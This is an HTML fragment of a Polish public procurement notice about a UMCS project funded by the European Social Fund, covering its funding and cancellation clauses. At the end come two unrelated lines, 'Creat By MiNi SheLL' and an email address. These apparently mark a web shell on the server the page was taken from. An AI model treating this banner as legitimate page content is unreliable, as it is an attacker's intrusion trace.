<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Postępowanie prowadzone jest w ramach realizacji projektu: UMCS dla rynku pracy i gospodarki opartej na wiedzy, nr
POKL.04.01.01-00-362/10 współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego,
Program Operacyjny Kapitał Ludzki..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com